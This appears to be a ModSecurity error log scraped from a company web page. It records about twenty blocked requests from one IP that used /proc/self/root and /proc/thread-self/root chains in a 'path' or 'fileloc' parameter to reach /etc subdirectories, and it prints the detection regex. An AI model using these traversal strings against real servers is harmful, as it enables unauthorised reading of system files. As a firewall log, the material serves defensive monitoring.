https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:22:41.027960 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.243.203:36014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVoa4xEDsg_V3ESNY4egAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:22:43.569152 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:53416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVozarLhPAjZGI1b2zfQAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:23:03.479227 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.243.203:53430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVt6BJNF7axNlVR0UB6QAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:05.947650 2026] [:error] [pid 18604:tid 140411599251200] [client 74.7.243.203:55986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVuUBd0UqwxWindINtKAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:08.371715 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.243.203:55998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVvKBJNF7axNlVR0UB6wAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:09.651617 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.203:56006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVvat8Nd0UC_OcbVG0RQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:10.815559 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:47708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVvq4xEDsg_V3ESNY4jQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:12.117590 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.243.203:47714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVwK4xEDsg_V3ESNY4jgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:13.465052 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.243.203:47726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVwUBd0UqwxWindINtMgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:14.621999 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:47730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVwjarLhPAjZGI1b2zgwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:15.973433 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.243.203:47742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVw6t8Nd0UC_OcbVG0TQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:17.177675 2026] [:error] [pid 1731:tid 140411658000128] [client 74.7.243.203:47756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVxQb2qCuy5irgBMjNvgAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:19.441677 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:47770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVxgb2qCuy5irgBMjNvwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:20.755483 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:47738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVyO82sZHvlq4xgHrIWgAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:22.051404 2026] [:error] [pid 18709:tid 140411624429312] [client 74.7.243.203:47752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVyjarLhPAjZGI1b2zhAAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:23.402861 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:47754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVy9CmCSWTlPouqorRQQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:24.753769 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.243.203:47768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVzJqmL8PQht4WJFlNDwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:26.015438 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:47784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVzgeiSKl8TjouI-YHCgAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:27.507096 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:47794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablVzweiSKl8TjouI-YHCwAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:28.850859 2026] [:error] [pid 18604:tid 140411674785536] [client 74.7.243.203:47806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV0EBd0UqwxWindINtRQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:23:30.035521 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.243.203:49080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablV0q4xEDsg_V3ESNY4kQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
